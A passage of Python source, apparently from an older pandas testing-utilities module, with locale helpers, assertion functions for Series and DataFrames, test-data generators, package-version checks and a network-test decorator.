*popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
def _default_locale_getter():
try:
raw_locales = check_output(['locale -a'], shell=True)
except subprocess.CalledProcessError as e:
raise type(e)("%s, the 'locale -a' command cannot be found on your "
"system" % e)
return raw_locales
def get_locales(prefix=None, normalize=True,
locale_getter=_default_locale_getter):
"""Get all the locales that are available on the system.
Parameters
----------
prefix : str
If not ``None`` then return only those locales with the prefix
provided. For example to get all English language locales (those that
start with ``"en"``), pass ``prefix="en"``.
normalize : bool
Call ``locale.normalize`` on the resulting list of available locales.
If ``True``, only locales that can be set without throwing an
``Exception`` are returned.
locale_getter : callable
The function to use to retrieve the current locales. This should return
a string with each locale separated by a newline character.
Returns
-------
locales : list of strings
A list of locale strings that can be set with ``locale.setlocale()``.
For example::
locale.setlocale(locale.LC_ALL, locale_string)
On error will return None (no locale available, e.g. Windows)
"""
try:
raw_locales = locale_getter()
except:
return None
try:
        # raw_locales is a "\n" separated list of locales
# it may contain non-decodable parts, so split
# extract what we can and then rejoin.
raw_locales = raw_locales.split(b'\n')
out_locales = []
for x in raw_locales:
if compat.PY3:
out_locales.append(str(x, encoding=pd.options.display.encoding))
else:
out_locales.append(str(x))
except TypeError:
pass
if prefix is None:
return _valid_locales(out_locales, normalize)
found = re.compile('%s.*' % prefix).findall('\n'.join(out_locales))
return _valid_locales(found, normalize)
@contextmanager
def set_locale(new_locale, lc_var=locale.LC_ALL):
"""Context manager for temporarily setting a locale.
Parameters
----------
new_locale : str or tuple
A string of the form <language_country>.<encoding>. For example to set
the current locale to US English with a UTF8 encoding, you would pass
"en_US.UTF-8".
Notes
-----
This is useful when you want to run a particular block of code under a
particular locale, without globally setting the locale. This probably isn't
thread-safe.
"""
current_locale = locale.getlocale()
try:
locale.setlocale(lc_var, new_locale)
try:
normalized_locale = locale.getlocale()
except ValueError:
yield new_locale
else:
if all(lc is not None for lc in normalized_locale):
yield '.'.join(normalized_locale)
else:
yield new_locale
finally:
locale.setlocale(lc_var, current_locale)
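# Illustrative use of set_locale (availability of 'en_US.UTF-8' varies by system):
#   with set_locale('en_US.UTF-8'):
#       datetime.now().strftime('%B')  # formatted under the temporary locale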
def _can_set_locale(lc):
"""Check to see if we can set a locale without throwing an exception.
Parameters
----------
lc : str
The locale to attempt to set.
Returns
-------
isvalid : bool
Whether the passed locale can be set
"""
try:
with set_locale(lc):
pass
    except locale.Error:  # horrible name for an Exception subclass
return False
else:
return True
def _valid_locales(locales, normalize):
"""Return a list of normalized locales that do not throw an ``Exception``
when set.
Parameters
----------
locales : str
A string where each locale is separated by a newline.
normalize : bool
Whether to call ``locale.normalize`` on each locale.
Returns
-------
valid_locales : list
A list of valid locales.
"""
if normalize:
normalizer = lambda x: locale.normalize(x.strip())
else:
normalizer = lambda x: x.strip()
return list(filter(_can_set_locale, map(normalizer, locales)))
#------------------------------------------------------------------------------
# Console debugging tools
def debug(f, *args, **kwargs):
from pdb import Pdb as OldPdb
try:
from IPython.core.debugger import Pdb
kw = dict(color_scheme='Linux')
except ImportError:
Pdb = OldPdb
kw = {}
pdb = Pdb(**kw)
return pdb.runcall(f, *args, **kwargs)
def pudebug(f, *args, **kwargs):
import pudb
return pudb.runcall(f, *args, **kwargs)
def set_trace():
from IPython.core.debugger import Pdb
try:
Pdb(color_scheme='Linux').set_trace(sys._getframe().f_back)
except:
from pdb import Pdb as OldPdb
OldPdb().set_trace(sys._getframe().f_back)
#------------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ''
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import nose
raise nose.SkipTest('no unicode file names on this system')
try:
yield filename
finally:
try:
os.close(fd)
except Exception as e:
print("Couldn't close file descriptor: %d (file: %s)" %
(fd, filename))
try:
if os.path.exists(filename):
os.remove(filename)
except Exception as e:
print("Exception on removing file: %s" % e)
def get_data_path(f=''):
"""Return the path of a data file, these are relative to the current test
directory.
"""
# get our callers file
_, filename, _, _, _, _ = inspect.getouterframes(inspect.currentframe())[1]
base_dir = os.path.abspath(os.path.dirname(filename))
return os.path.join(base_dir, 'data', f)
#------------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2):
"""Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_equal(a, b, msg=""):
"""asserts that a equals b, like nose's assert_equal, but allows custom message to start.
Passes a and b to format string as well. So you can use '{0}' and '{1}' to display a and b.
Examples
--------
>>> assert_equal(2, 2, "apples")
>>> assert_equal(5.2, 1.2, "{0} was really a dead parrot")
Traceback (most recent call last):
...
AssertionError: 5.2 was really a dead parrot: 5.2 != 1.2
"""
assert a == b, "%s: %r != %r" % (msg.format(a,b), a, b)
def assert_index_equal(left, right, exact=False, check_names=True):
assertIsInstance(left, Index, '[index] ')
assertIsInstance(right, Index, '[index] ')
if not left.equals(right) or (exact and type(left) != type(right)):
raise AssertionError("[index] left [{0} {1}], right [{2} {3}]".format(left.dtype,
left,
right,
right.dtype))
if check_names:
assert_attr_equal('names', left, right)
def assert_attr_equal(attr, left, right):
"""checks attributes are equal. Both objects must have attribute."""
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
assert_equal(left_attr,right_attr,"attr is not equal [{0}]" .format(attr))
def isiterable(obj):
return hasattr(obj, '__iter__')
def is_sorted(seq):
return assert_almost_equal(seq, np.sort(np.array(seq)))
def assertIs(first, second, msg=''):
"""Checks that 'first' is 'second'"""
a, b = first, second
assert a is b, "%s: %r is not %r" % (msg.format(a, b), a, b)
def assertIsNot(first, second, msg=''):
"""Checks that 'first' is not 'second'"""
a, b = first, second
assert a is not b, "%s: %r is %r" % (msg.format(a, b), a, b)
def assertIn(first, second, msg=''):
"""Checks that 'first' is in 'second'"""
a, b = first, second
assert a in b, "%s: %r is not in %r" % (msg.format(a, b), a, b)
def assertNotIn(first, second, msg=''):
"""Checks that 'first' is not in 'second'"""
a, b = first, second
assert a not in b, "%s: %r is in %r" % (msg.format(a, b), a, b)
def assertIsNone(expr, msg=''):
"""Checks that 'expr' is None"""
return assertIs(expr, None, msg)
def assertIsNotNone(expr, msg=''):
"""Checks that 'expr' is not None"""
return assertIsNot(expr, None, msg)
def assertIsInstance(obj, cls, msg=''):
"""Test that obj is an instance of cls
(which can be a class or a tuple of classes,
as supported by isinstance())."""
assert isinstance(obj, cls), (
"%sExpected object to be of type %r, found %r instead" % (
msg, cls, type(obj)))
def assert_isinstance(obj, class_type_or_tuple, msg=''):
return deprecate('assert_isinstance', assertIsInstance)(obj, class_type_or_tuple, msg=msg)
def assertNotIsInstance(obj, cls, msg=''):
"""Test that obj is not an instance of cls
(which can be a class or a tuple of classes,
as supported by isinstance())."""
assert not isinstance(obj, cls), (
"%sExpected object to be of type %r, found %r instead" % (
msg, cls, type(obj)))
def assert_categorical_equal(res, exp):
if not array_equivalent(res.categories, exp.categories):
raise AssertionError(
'categories not equivalent: {0} vs {1}.'.format(res.categories,
exp.categories))
if not array_equivalent(res.codes, exp.codes):
raise AssertionError(
'codes not equivalent: {0} vs {1}.'.format(res.codes, exp.codes))
if res.ordered != exp.ordered:
raise AssertionError("ordered not the same")
if res.name != exp.name:
raise AssertionError("name not the same")
def assert_numpy_array_equal(np_array, assert_equal):
"""Checks that 'np_array' is equal to 'assert_equal'
Note that the expected array should not contain `np.nan`!
Two numpy arrays are equal if all
elements are equal, which is not possible if `np.nan` is such an element!
If the expected array includes `np.nan` use
`assert_numpy_array_equivalent(...)`.
"""
if np.array_equal(np_array, assert_equal):
return
raise AssertionError(
'{0} is not equal to {1}.'.format(np_array, assert_equal))
def assert_numpy_array_equivalent(np_array, assert_equal, strict_nan=False):
"""Checks that 'np_array' is equivalent to 'assert_equal'
Two numpy arrays are equivalent if the arrays have equal non-NaN elements,
and `np.nan` in corresponding locations.
    If the expected array does not contain `np.nan`,
    `assert_numpy_array_equivalent` behaves like
    `assert_numpy_array_equal()`. If the expected array includes
    `np.nan`, use this function.
"""
if array_equivalent(np_array, assert_equal, strict_nan=strict_nan):
return
raise AssertionError(
'{0} is not equivalent to {1}.'.format(np_array, assert_equal))
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(left, right, check_dtype=True,
check_index_type=False,
check_series_type=False,
check_less_precise=False,
check_exact=False,
check_names=True):
if check_series_type:
assertIsInstance(left, type(right))
if check_dtype:
assert_attr_equal('dtype', left, right)
if check_exact:
if not np.array_equal(left.values, right.values):
raise AssertionError('{0} is not equal to {1}.'.format(left.values,
right.values))
else:
assert_almost_equal(left.values, right.values, check_less_precise)
if check_less_precise:
assert_almost_equal(
left.index.values, right.index.values, check_less_precise)
else:
assert_index_equal(left.index, right.index, check_names=check_names)
if check_index_type:
for level in range(left.index.nlevels):
lindex = left.index.get_level_values(level)
rindex = right.index.get_level_values(level)
assertIsInstance(lindex, type(rindex))
assert_attr_equal('dtype', lindex, rindex)
assert_attr_equal('inferred_type', lindex, rindex)
if check_names:
if is_number(left.name) and np.isnan(left.name):
# Series.name can be np.nan in some test cases
assert is_number(right.name) and np.isnan(right.name)
elif left.name is pd.NaT:
assert right.name is pd.NaT
else:
assert_attr_equal('name', left, right)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(left, right, check_dtype=True,
check_index_type=False,
check_column_type=False,
check_frame_type=False,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False):
if check_frame_type:
assertIsInstance(left, type(right))
assertIsInstance(left, DataFrame)
assertIsInstance(right, DataFrame)
if check_less_precise:
if not by_blocks:
assert_almost_equal(left.columns, right.columns)
assert_almost_equal(left.index, right.index)
else:
if not by_blocks:
assert_index_equal(left.columns, right.columns, check_names=check_names)
# compare by blocks
if by_blocks:
rblocks = right.blocks
lblocks = left.blocks
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(lblocks[dtype],rblocks[dtype], check_dtype=check_dtype)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.icol(i)
rcol = right.icol(i)
assert_series_equal(lcol, rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names)
if check_index_type:
for level in range(left.index.nlevels):
lindex = left.index.get_level_values(level)
rindex = right.index.get_level_values(level)
assertIsInstance(lindex, type(rindex))
assert_attr_equal('dtype', lindex, rindex)
assert_attr_equal('inferred_type', lindex, rindex)
if check_column_type:
assertIsInstance(left.columns, type(right.columns))
assert_attr_equal('dtype', left.columns, right.columns)
assert_attr_equal('inferred_type', left.columns, right.columns)
if check_names:
assert_attr_equal('names', left.index, right.index)
assert_attr_equal('names', left.columns, right.columns)
def assert_panelnd_equal(left, right,
check_panel_type=False,
check_less_precise=False,
assert_func=assert_frame_equal,
check_names=False):
if check_panel_type:
assertIsInstance(left, type(right))
for axis in ['items', 'major_axis', 'minor_axis']:
left_ind = getattr(left, axis)
right_ind = getattr(right, axis)
assert_index_equal(left_ind, right_ind, check_names=check_names)
for i, item in enumerate(left._get_axis(0)):
assert item in right, "non-matching item (right) '%s'" % item
litem = left.iloc[i]
ritem = right.iloc[i]
assert_func(litem, ritem, check_less_precise=check_less_precise)
for i, item in enumerate(right._get_axis(0)):
assert item in left, "non-matching item (left) '%s'" % item
# TODO: strangely check_names fails in py3 ?
_panel_frame_equal = partial(assert_frame_equal, check_names=False)
assert_panel_equal = partial(assert_panelnd_equal,
assert_func=_panel_frame_equal)
assert_panel4d_equal = partial(assert_panelnd_equal,
assert_func=assert_panel_equal)
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, "Did not contain item: '%r'" % k
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements comparable with assert_almost_equal
Checks that the elements are equal, but not the same object. (Does not
check that items in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
assert elem1 is not elem2, "Expected object %r and object %r to be different objects, were same." % (
type(elem1), type(elem2))
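
# Illustrative sketch (not part of the original module): assert_copy accepts
# sequences whose elements compare equal but are distinct objects.  The lists
# below are made up for the example.
def _example_assert_copy_usage():
    a = [[1, 2], [3, 4]]
    b = [list(x) for x in a]   # equal values, different objects
    assert_copy(a, b)          # passes; assert_copy(a, a) would fail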
def getCols(k):
return string.ascii_uppercase[:k]
def getArangeMat():
return np.arange(N * K).reshape((N, K))
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
    return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(np.random.choice(x,k), name=name)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False,True], name=name)
return Index([False,True] + [False]*(k-2), name=name)
def makeIntIndex(k=10, name=None):
return Index(lrange(k), name=name)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq='B', name=None):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name)
def makeTimedeltaIndex(k=10, freq='D', name=None):
return TimedeltaIndex(start='1 day', periods=k, freq=freq, name=name)
def makePeriodIndex(k=10, name=None):
dt = datetime(2000, 1, 1)
dr = PeriodIndex(start=dt, periods=k, freq='B', name=name)
return dr
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [makeIntIndex, makeFloatIndex, makeStringIndex,
makeUnicodeIndex, makeDateIndex, makePeriodIndex,
makeTimedeltaIndex, makeBoolIndex,
makeCategoricalIndex]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-seires.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
dateIndex = makeDateIndex(N)
dateIndex = Index(dateIndex, dtype=object)
index = makeStringIndex(N)
return Series(dateIndex, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return dict((c, Series(randn(N), index=index)) for c in getCols(K))
def makeTimeSeries(nper=None, freq='B', name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq='B'):
return dict((c, makeTimeSeries(nper, freq)) for c in getCols(K))
def getPeriodData(nper=None):
return dict((c, makePeriodSeries(nper)) for c in getCols(K))
# make frame
def makeTimeDataFrame(nper=None, freq='B'):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(['a', 'b', 'c', 'd', 'e'])
data = {
'A': [0., 1., 2., 3., 4.],
'B': [0., 1., 0., 1., 0.],
'C': ['foo1', 'foo2', 'foo3', 'foo4', 'foo5'],
'D': bdate_range('1/1/2009', periods=5)
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makePanel(nper=None):
cols = ['Item' + c for c in string.ascii_uppercase[:K - 1]]
data = dict((c, makeTimeDataFrame(nper)) for c in cols)
return Panel.fromDict(data)
def makePeriodPanel(nper=None):
cols = ['Item' + c for c in string.ascii_uppercase[:K - 1]]
data = dict((c, makePeriodFrame(nper)) for c in cols)
return Panel.fromDict(data)
def makePanel4D(nper=None):
return Panel4D(dict(l1=makePanel(nper), l2=makePanel(nper),
l3=makePanel(nper)))
def makeCustomIndex(nentries, nlevels, prefix='#', names=False, ndupe_l=None,
idx_type=None):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default names,
if false will use no names, if a list is given, the name of each level
in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert (is_sequence(ndupe_l) and len(ndupe_l) <= nlevels)
assert (names is None or names is False
            or names is True or len(names) == nlevels)
assert idx_type is None or \
(idx_type in ('i', 'f', 's', 'u', 'dt', 'p', 'td') and nlevels == 1)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
    # make singleton case uniform
if isinstance(names, compat.string_types) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(i=makeIntIndex, f=makeFloatIndex, s=makeStringIndex,
u=makeUnicodeIndex, dt=makeDateIndex, td=makeTimedeltaIndex,
p=makePeriodIndex).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError('"%s" is not a legal value for `idx_type`, use '
'"i"/"f"/"s"/"u"/"dt/"p"/"td".' % idx_type)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all([x > 0 for x in ndupe_l])
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub("[^\d_]_?", "", x).split("_")
return lmap(int, numeric_tuple)
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = prefix + '_l%d_g' % i + str(j)
cnt[label] = ndupe_l[i]
# cute Counter trick
result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]
tuples.append(result)
tuples = lzip(*tuples)
# convert tuples to index
if nentries == 1:
index = Index(tuples[0], name=names[0])
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
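
# Illustrative sketch (not part of the original module): building a two-level
# MultiIndex of six entries with the default '#0'/'#1' level names described above.
def _example_make_custom_index():
    idx = makeCustomIndex(nentries=6, nlevels=2, names=True)
    assert idx.nlevels == 2 and len(idx) == 6
    return idx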
def makeCustomDataframe(nrows, ncols, c_idx_names=True, r_idx_names=True,
c_idx_nlevels=1, r_idx_nlevels=1, data_gen_f=None,
c_ndupe_l=None, r_ndupe_l=None, dtype=None,
c_idx_type=None, r_idx_type=None):
"""
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which returns the data value at that position,
the default generator used yields values of the form "RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding index.
The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of
length N < idx_nlevels, for just the first N levels. If ndupe
doesn't divide nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
       have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
    # 5 rows, 3 columns, default names on both, single index on both axes
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated twice on first level,
# default names on both axis, single index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
    # 4-level multiindex on rows with names provided, 2-level multiindex
    # on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or \
(r_idx_type in ('i', 'f', 's', 'u', 'dt', 'p', 'td') and r_idx_nlevels == 1)
assert c_idx_type is None or \
(c_idx_type in ('i', 'f', 's', 'u', 'dt', 'p', 'td') and c_idx_nlevels == 1)
columns = makeCustomIndex(ncols, nlevels=c_idx_nlevels, prefix='C',
names=c_idx_names, ndupe_l=c_ndupe_l,
idx_type=c_idx_type)
index = makeCustomIndex(nrows, nlevels=r_idx_nlevels, prefix='R',
names=r_idx_names, ndupe_l=r_ndupe_l,
idx_type=r_idx_type)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: "R%dC%d" % (r, c)
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1. / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(nrows, ncols, density=.9, random_state=None,
c_idx_names=True, r_idx_names=True,
c_idx_nlevels=1, r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None, r_ndupe_l=None, dtype=None,
c_idx_type=None, r_idx_type=None):
"""
Parameters
----------
    density : float, optional
        Float in (0, 1) giving the proportion of non-missing entries in
        the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(nrows, ncols, c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l, r_ndupe_l=r_ndupe_l,
dtype=dtype, c_idx_type=c_idx_type,
r_idx_type=r_idx_type)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
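
# Illustrative sketch (not part of the original module): requests a 10x4 frame
# where roughly 10% of the cells are marked missing (per the density parameter);
# random_state=42 is an arbitrary seed chosen for reproducibility.
def _example_make_missing_frame():
    df = makeMissingCustomDataframe(10, 4, density=0.9, random_state=42)
    return df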
def makeMissingDataframe(density=.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density,
random_state=random_state)
df.values[i, j] = np.nan
return df
def add_nans(panel):
I, J, N = panel.shape
for i, item in enumerate(panel.items):
dm = panel[item]
for j, col in enumerate(dm.columns):
dm[col][:i + j] = np.NaN
return panel
def add_nans_panel4d(panel4d):
for l, label in enumerate(panel4d.labels):
panel = panel4d[label]
add_nans(panel)
return panel4d
class TestSubDict(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
# Dependency checks. Copied this from Nipy/Nipype (Copyright of
# respective developers, license: BSD-3)
def package_check(pkg_name, version=None, app='pandas', checker=LooseVersion,
exc_failed_import=ImportError,
exc_failed_check=RuntimeError):
"""Check that the minimal version of the required package is installed.
Parameters
----------
pkg_name : string
Name of the required package.
version : string, optional
Minimal version number for required package.
app : string, optional
Application that is performing the check. For instance, the
name of the tutorial being executed that depends on specific
packages.
checker : object, optional
The class that will perform the version checking. Default is
distutils.version.LooseVersion.
exc_failed_import : Exception, optional
Class of the exception to be thrown if import failed.
exc_failed_check : Exception, optional
Class of the exception to be thrown if version check failed.
Examples
--------
package_check('numpy', '1.3')
package_check('networkx', '1.0', 'tutorial1')
"""
if app:
msg = '%s requires %s' % (app, pkg_name)
else:
msg = 'module requires %s' % pkg_name
if version:
msg += ' with version >= %s' % (version,)
try:
mod = __import__(pkg_name)
except ImportError:
raise exc_failed_import(msg)
if not version:
return
try:
have_version = mod.__version__
except AttributeError:
raise exc_failed_check('Cannot find version for %s' % pkg_name)
if checker(have_version) < checker(version):
raise exc_failed_check(msg)
def skip_if_no_package(*args, **kwargs):
"""Raise SkipTest if package_check fails
Parameters
----------
*args Positional parameters passed to `package_check`
*kwargs Keyword parameters passed to `package_check`
"""
from nose import SkipTest
package_check(exc_failed_import=SkipTest,
exc_failed_check=SkipTest,
*args, **kwargs)
#
# Additional tags decorators for nose
#
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
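
# Illustrative sketch (not part of the original module): a decorator wrapped with
# optional_args can be applied bare or with keyword arguments.  _tag, _plain and
# _labelled are made-up names for the example.
@optional_args
def _tag(f, label="default"):
    f.label = label
    return f

@_tag
def _plain():
    pass

@_tag(label="custom")
def _labelled():
    pass
# _plain.label == "default", _labelled.label == "custom"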
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
'timed out',
'Server Hangup',
'HTTP Error 503: Service Unavailable',
'502: Proxy Error',
'HTTP Error 502: internal error',
'HTTP Error 502',
'HTTP Error 503',
'HTTP Error 403',
'Temporary failure in name resolution',
'Name or service not known',
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on these exception types
_network_error_classes = (IOError, httplib.HTTPException)
if sys.version_info >= (3, 3):
_network_error_classes += (TimeoutError,)
def can_connect(url, error_classes=_network_error_classes):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(t, url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=_network_error_classes,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check for connectivity.
Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
        message. Intended to suppress errors where an errno isn't available.
Notes
-----
    * ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
